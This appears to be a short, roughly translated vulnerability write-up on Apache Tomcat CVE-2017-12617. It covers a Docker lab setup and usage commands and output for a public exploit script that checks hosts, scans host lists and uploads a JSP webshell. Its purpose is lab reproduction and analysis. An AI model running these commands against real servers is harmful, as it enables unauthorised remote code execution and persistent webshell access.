cve-2017-12617 Vulnerability Analysis __tomcat

cve-2017-12617

The Apache Tomcat team announced October 3 that if the default servlet is configured, at 9.0.1 (Beta), 8.5.23, All Tomcat versions prior to 8.0.47 and 7.0.82 contain potentially dangerous remote execution code (RCE) vulnerabilities on all operating systems, cve-2017-12617: Remote code execution vulnerabilities. Environment

Using Image:tomcat:7.0.79-jre8 to reproduce vulnerabilities

Docker-compose up-d

Modify the. \conf\web.xml configuration file and increase the ReadOnly setting to False, and be sure to reboot the Tomcat service.
In order not to import the data every time, we will persist in the way of Mount, put the web.xml definition that needs to be modified in./directory, mount to the container specified directory
Volumes:
-/web.xml:/usr/local/tomcat/conf/web.xml POC

./cve-2017-12617.py [Options]

Options

-U, –url [::] Check target URL if it ' s vulnerable

-P,–PWN [::] Generate Webshell and upload it

-l,–list [::] Hosts List

[+]usage:

./cve-2017-12617.py-u http://127.0.0.1

./cve-2017-12617.py–url http://127.0.0.1

./ Cve-2017-12617.py-u http://127.0.0.1-p pwn

./cve-2017-12617.py–url http://127.0.0.1-pwn pwn

./cve-20 17-12617.py-l hotsts.txt

./cve-2017-12617.py–list hosts.txt

Python tomcat-cve-2017-12617.py-u http://10.160.11.191:8080



   _____      ________    ___   ___  __ _     __ ___   __ __ ______ 
  / ____\ \    / /  ____|  | __ \ / _ \/_ |____  |   /_ |__ \ / //_ |____  |
 | |     \ \  / /| |__ ______ ) | | | || |   / /_____| |  ) / /_ | |   / / 
 | |      \ \/ / |  __|______/ /| | | || |  / /______| | / / '_ \| |  / /  
 | |____   \  /  | |____    / /_| |_| || | / /       | |/ /| (_) | | / /   
  \_____|   \/   |______|  | ____|\___/|_|/_/        |_|____\___/|_|/_/    



[@intx0x80]


Poc Filename  poc.jsp
File Created.
http://10.160.11.191:8080 it ' s vulnerable to cve-2017-12617
http://10.160.11.191:8080/Poc.jsp

Reference

*http://www.freebuf.com/vuls/150203.html